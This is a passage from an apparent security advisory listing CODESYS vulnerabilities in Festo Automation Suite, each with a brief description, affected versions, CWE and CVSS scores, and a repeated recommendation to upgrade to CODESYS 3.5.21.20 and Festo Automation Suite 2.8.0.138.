Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2023-37550 In multiple Codesys products in multiple versions, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpApp component to read internally from an invalid address, potentially leading to a denial-of-service condition. This vulnerability is different to CVE-2023-37545, CVE-2023-37546, CVE-2023-37547, CVE-2023-37548 and CVE-2023-37549. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2023-37551 In multiple Codesys products in multiple versions, after successful authentication as a user, specially crafted network communication requests can utilize the CmpApp component to download files with any file extensions to the controller. In contrast to the regular file download via CmpFileTransfer, no filtering of certain file types is performed here. As a result, the integrity of the CODESYS control runtime system may be compromised by the files loaded onto the controller. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-552 Files or Directories Accessible to External Parties Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N CVE-2023-37552 In multiple versions of multiple Codesys products, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpAppBP component to read internally from an invalid address, potentially leading to a denial-of-service condition. This vulnerability is different to CVE-2023-37553, CVE-2023-37554, CVE-2023-37555 and CVE-2023-37556. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2023-37553 In multiple versions of multiple Codesys products, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpAppBP component to read internally from an invalid address, potentially leading to a denial-of-service condition. This vulnerability is different to CVE-2023-37552, CVE-2023-37554, CVE-2023-37555 and CVE-2023-37556. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2023-37554 In multiple versions of multiple Codesys products, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpAppBP component to read internally from an invalid address, potentially leading to a denial-of-service condition. This vulnerability is different to CVE-2023-37552, CVE-2023-37553, CVE-2023-37555 and CVE-2023-37556. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2023-37555 In multiple versions of multiple Codesys products, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpAppBP component to read internally from an invalid address, potentially leading to a denial-of-service condition. This vulnerability is different to CVE-2023-37552, CVE-2023-37553, CVE-2023-37554 and CVE-2023-37556. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2023-37556 In multiple versions of multiple Codesys products, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpAppBP component to read internally from an invalid address, potentially leading to a denial-of-service condition. This vulnerability is different to CVE-2023-37552, CVE-2023-37553, CVE-2023-37554 and CVE-2023-37555. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2023-37557 After successful authentication as a user in multiple Codesys products in multiple versions, specific crafted remote communication requests can cause the CmpAppBP component to overwrite a heap-based buffer, which can lead to a denial-of-service condition. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2023-37558 After successful authentication as a user in multiple Codesys products in multiple versions, specific crafted network communication requests with inconsistent content can cause the CmpAppForce component to read internally from an invalid address, potentially leading to a denial-of-service condition. This vulnerability is different to CVE-2023-37559 View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2023-37559 After successful authentication as a user in multiple Codesys products in multiple versions, specific crafted network communication requests with inconsistent content can cause the CmpAppForce component to read internally from an invalid address, potentially leading to a denial-of-service condition. This vulnerability is different to CVE-2023-37558 View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2023-3935 A heap buffer overflow vulnerability in Wibu CodeMeter Runtime network service up to version 7.60b allows an unauthenticated, remote attacker to achieve RCE and gain full access of the host system. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2023-49675 An unauthenticated local attacker may trick a user to open corrupted project files to execute arbitrary code or crash the system due to an out-of-bounds write vulnerability. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H CVE-2023-49676 An unauthenticated local attacker may trick a user to open corrupted project files to crash the system due to use after free vulnerability. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 